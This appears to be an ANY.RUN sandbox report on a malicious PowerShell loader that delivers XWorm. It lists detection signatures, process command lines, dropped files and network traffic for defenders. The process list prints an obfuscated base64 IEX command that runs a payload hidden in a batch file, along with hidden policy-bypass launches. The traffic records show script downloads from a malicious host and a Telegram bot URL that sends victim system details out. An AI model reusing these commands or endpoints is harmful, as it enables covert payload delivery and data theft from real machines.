File name:

file.ps1

Full analysis: https://app.any.run/tasks/a3c1b404-2a73-4a6e-a673-6b7e51050716
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 20, 2025, 22:32:20
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
telegram
remote
xworm
arch-doc
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

A545636AD57C59678B37A1BE4A312198

SHA1:

F6D7E4F633B0D0B4D05B01948B247AC6C0778804

SHA256:

92F7C49C24134DB3D86284DA0C23947310505C20A60040FBCF61E32AE7B8FA1C

SSDEEP:

24:V5bnCT9+yHWrH3HDlJHhyzTbqIH1jTDoQtRF:V5SQrrXjlJBAb7BD3tRF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 720)
      • powershell.exe (PID: 728)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5508)
      • powershell.exe (PID: 5380)
      • cmd.exe (PID: 780)
      • cmd.exe (PID: 920)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 728)
    • Create files in the Startup directory

      • powershell.exe (PID: 6404)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 744)
      • powershell.exe (PID: 1244)
    • XWORM has been detected (SURICATA)

      • PING.EXE (PID: 2236)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 720)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 6652)
      • wscript.exe (PID: 6080)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 5380)
      • cmd.exe (PID: 780)
      • cmd.exe (PID: 920)
      • cmd.exe (PID: 1240)
      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 3020)
      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 2392)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
    • The process executes Powershell scripts

      • powershell.exe (PID: 5380)
    • Application launched itself

      • powershell.exe (PID: 5380)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)
    • The process executes VB scripts

      • powershell.exe (PID: 6404)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 6808)
      • wscript.exe (PID: 4464)
      • wscript.exe (PID: 6652)
      • wscript.exe (PID: 6080)
    • Converts TXT file into a string

      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 744)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 744)
      • powershell.exe (PID: 3784)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5508)
      • cmd.exe (PID: 1240)
      • cmd.exe (PID: 2392)
      • cmd.exe (PID: 3020)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • PING.EXE (PID: 2236)
    • Connects to unusual port

      • PING.EXE (PID: 1660)
      • PING.EXE (PID: 2236)
    • Contacting a server suspected of hosting a CnC

      • PING.EXE (PID: 2236)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 720)
    • Process drops python dynamic module

      • powershell.exe (PID: 720)
  • INFO

    • Disables trace logs

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • PING.EXE (PID: 2236)
    • Checks proxy server information

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 6404)
      • powershell.exe (PID: 720)
      • PING.EXE (PID: 2236)
      • slui.exe (PID: 1276)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2096)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 728)
    • Autorun file from Startup directory

      • powershell.exe (PID: 6404)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 3784)
      • powershell.exe (PID: 744)
    • Manual execution by a user

      • wscript.exe (PID: 6080)
      • wscript.exe (PID: 6652)
      • notepad.exe (PID: 2908)
      • notepad.exe (PID: 4172)
      • notepad.exe (PID: 5452)
      • OpenWith.exe (PID: 5508)
      • notepad.exe (PID: 2840)
      • OpenWith.exe (PID: 5600)
      • OpenWith.exe (PID: 6700)
      • OpenWith.exe (PID: 3176)
    • Reads the software policy settings

      • PING.EXE (PID: 2236)
    • The sample compiled with English language support

      • powershell.exe (PID: 720)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 4172)
      • notepad.exe (PID: 2840)
      • notepad.exe (PID: 2908)
      • notepad.exe (PID: 5452)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5508)
      • OpenWith.exe (PID: 5600)
    • Creates files or folders in the user directory

      • PING.EXE (PID: 1660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
174
Monitored processes
53
Malicious processes
12
Suspicious processes
3

Behavior graph

start powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs #XWORM ping.exe conhost.exe no specs ping.exe conhost.exe no specs ping.exe no specs conhost.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs ping.exe no specs conhost.exe no specs slui.exe notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs svchost.exe

Process information

PID: 720
CMD: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\pyhw.ps1"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
PID: 728
CMD: powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators:
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 744
CMD: POwERshEll -W H -C "IEX([SYSTem.Text.EnCOdINg]::uTf8.gETSTRinG([SySTEm.cOnveRt]::fROmbase64StriNG(($edrBVDSYisRFkGrVqeaPno=[SYsteM.iO.fiLe]::READAllTExt('C:\Users\admin\AppData\Local\data.bat')).SubsTriNg($edrBVDSYisRFkGrVqeaPno.lengTH - 230688))))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators:
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
PID: 780
CMD: "C:\WINDOWS\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
Path: C:\Windows\System32\cmd.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 780
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 920
CMD: "C:\WINDOWS\system32\cmd.exe" /c start /min powershell -ArgumentList "-WindowStyle Hidden -ExecutionPolicy Bypass -Command"
Path: C:\Windows\System32\cmd.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 1040
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1116
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Indicators:
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1240
CMD: "C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Local\version.bat"
Path: C:\Windows\System32\cmd.exe
Indicators:
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1244
CMD: POwERshEll -W H -C "IEX([SYSTem.Text.EnCOdINg]::uTf8.gETSTRinG([SySTEm.cOnveRt]::fROmbase64StriNG(($edrBVDSYisRFkGrVqeaPno=[SYsteM.iO.fiLe]::READAllTExt('C:\Users\admin\AppData\Local\data.bat')).SubsTriNg($edrBVDSYisRFkGrVqeaPno.lengTH - 230688))))"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators:
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
64 155
Read events
64 136
Write events
19
Delete events
0

Modification events

(PID) Process: (6404) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation: write
Name: VBSFile
Value:
(PID) Process: (6404) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation: write
Name: SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: EnableFileTracing
Value:
0
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value:
0
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value:
0
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: FileTracingMask
Value:
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: MaxFileSize
Value:
1048576
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASAPI32
Operation: write
Name: FileDirectory
Value:
%windir%\tracing
(PID) Process: (2236) PING.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ping_RASMANCS
Operation: write
Name: EnableFileTracing
Value:
0
Executable files
71
Suspicious files
397
Text files
1 541
Unknown types
0

Dropped files

PID: 5380
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fydhlnic.4mc.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 6744
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10cc3b.TMP
Type: binary
MD5: 44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256: 78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
PID: 5380
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\77W4OOCA7S8M2MY150L5.temp
Type: binary
MD5: 44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256: 78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
PID: 2096
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10d92b.TMP
Type: binary
MD5: 04A14DFF61996CFF80EA65DD7DA411B4
SHA256: 10F62C2622350715C9F80BB38902A3D06C418A26F80953F9992D569503EE2651
PID: 5380
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c1bb.TMP
Type: binary
MD5: D040F64E9E7A2BB91ABCA5613424598E
SHA256: D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
PID: 2096
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\F3O3BUM3P4R1RQDAK3K1.temp
Type: binary
MD5: 4386C1BFAF2F131FFB862CFE9FCA93CC
SHA256: BEF60DA733DC9766D202276184F37FC940BA39050321CA489E1CEDD8B28F7731
PID: 6404
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ic1eed2h.hyr.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID: 2096
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type: binary
MD5: 4386C1BFAF2F131FFB862CFE9FCA93CC
SHA256: BEF60DA733DC9766D202276184F37FC940BA39050321CA489E1CEDD8B28F7731
PID: 5380
Process: powershell.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type: binary
MD5: 44CD0856CBDC8C2E4DE80B75DDE75CBE
SHA256: 78D4DDAE5D4891169FFD919006A61754C702875DE728EB317540876951EFE750
PID: 5380
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\rhw.ps1
Type: text
MD5: 09B33C31893B6E905354F3ABC93FA4EB
SHA256: C94C63954D38869DB63D24CB8542E0745D3CEE866E2179A4F6784839468C998A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
68
DNS requests
8
Threats
22

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
184.24.77.27:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5380
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/rhw.ps1
unknown
malicious
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/data.bat
unknown
malicious
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/Host.vbs
unknown
malicious
GET
200
15.235.130.195:80
http://activetools.live/version.bat
unknown
malicious
5380
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/pyhw.ps1
unknown
malicious
GET
302
140.82.121.4:443
https://github.com/Ladyhaha06/Python/archive/refs/heads/main.zip
unknown
6404
powershell.exe
GET
200
15.235.130.195:80
http://activetools.live/version.vbs
unknown
malicious
GET
200
140.82.121.4:443
https://codeload.github.com/Ladyhaha06/Python/zip/refs/heads/main
unknown
compressed
51.8 Mb
whitelisted
GET
200
149.154.167.99:443
https://api.telegram.org/bot7893859191:AAHLsNiKLZvrhmqdFg6_SNlFeLv3-gwCyLI/sendMessage?chat_id=1773070934&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC675AA541651500BD358%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20Th3
unknown
binary
609 b
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2104
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
184.24.77.27:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5380
powershell.exe
15.235.130.195:80
activetools.live
OVH SAS
SG
malicious
6404
powershell.exe
15.235.130.195:80
activetools.live
OVH SAS
SG
malicious
720
powershell.exe
140.82.121.3:443
github.com
GITHUB
US
whitelisted
720
powershell.exe
140.82.121.9:443
codeload.github.com
GITHUB
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.23.110
whitelisted
crl.microsoft.com
  • 184.24.77.27
  • 184.24.77.31
  • 184.24.77.28
  • 184.24.77.14
  • 184.24.77.24
  • 184.24.77.15
  • 184.24.77.17
  • 184.24.77.11
  • 184.24.77.30
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
activetools.live
  • 15.235.130.195
unknown
github.com
  • 140.82.121.3
whitelisted
codeload.github.com
  • 140.82.121.9
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
5380
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
5380
powershell.exe
Potentially Bad Traffic
ET HUNTING Generic Powershell Launching Hidden Window
5380
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5380
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Gen.Powershell.Downloader Script Payload
6404
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6404
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6404
powershell.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
5380
powershell.exe
Potentially Bad Traffic
ET INFO PS1 Powershell File Request
5380
powershell.exe
Potentially Bad Traffic
ET HUNTING Generic Powershell Launching Hidden Window
5380
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
No debug info